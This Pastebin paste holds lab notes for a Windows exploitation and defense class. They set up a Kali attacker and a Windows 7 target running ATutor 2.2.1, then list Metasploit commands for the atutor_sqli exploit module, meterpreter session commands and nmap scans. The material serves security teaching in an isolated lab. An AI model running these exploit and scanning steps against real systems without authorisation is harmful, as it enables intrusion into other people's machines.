Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Windows Exploitation and Defense
- --------------------------------
- Network settings for lab
- ------------------------
- select oracle vm manager
- File -> Preferences
- Network -> Select Plus
- Ok
- select Kali Linux 2018 -> Settings
- Network -> NATNetwork
- Ok
- Start
- Kali - attacker
- ---------------
- username: root
- password: toor
- terminal -> command prompt
- ifconfig
- same as ipconfig on Windows
- start metasploit
- msfconsole
- Victim / target
- ----------------
- Select Win7 machine
- Settings -> Network ->
- NatNetwork
- OK
- Start
- on windows7 vm
- go to start
- xampp
- start apache and mysql services
- open browser
- download https://sourceforge.net/projects/atutor/files/ATutor%202/
- download and extract atutor 2.2.1
- place the folder inside C:/xampp/htdocs
- install atutor
- go to http://localhost/atutor to complete the installation.
- ----------
- first attack using metasploit
- -----------------------------
- msfconsole
- search atutor
- info exploit/multi/http/atutor_sqli
- use exploit/multi/http/atutor_sqli
- show options
- set RHOSTS <Windows 7 IP>
- run
- meterpreter>help
- meterpreter>ps
- meterpreter>sysinfo
- meterpreter>pwd
- meterpreter>cd C:
- meterpreter>mkdir KBNN
- additional metasploit commands
- ------------------------------
- help
- show <module name>
- show auxiliary
- info <path>
- info exploit/multi/http/atutor_sqli
- use <path>
- use exploit/multi/http/atutor_sqli
- show options
- set <parameter name> value
- set RHOSTS 10.0.2.4
- discussion
- -----------
- Find out what happens when we log into Windows machine
- What hashing algorithm is used by Windows OS?
- Is the hashing algorithm strong enough?
- Where is the password stored on Windows machine?
- Why is minimum password length 8 ????
- port scanning
- -------------
- search portscan
- use auxiliary/scanner/portscan/syn
- show options
- set RHOSTS <Windows7 IP>
- run
- nmap -h
- man nmap
- press space to continue reading
- press q to exit
- nmap <Win7 IP>
- nmap 10.0.2.4
- nmap -v <Win7 IP>
- nmap -v -sS <Win7 IP>
- nmap -v -sT <Win7 IP>
- nmap -sV <port number> <Win7 IP>
- nmap -O <Win7 IP>
- nmap -A <Win7 IP> filename
- reference urls
- ---------------
- https://www.cvedetails.com/
- https://www.first.org/cvss/calculator/3.0#
- https://md5hashing.net/
- https://tobtu.com/lmntlm.php
- https://nmap.org/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement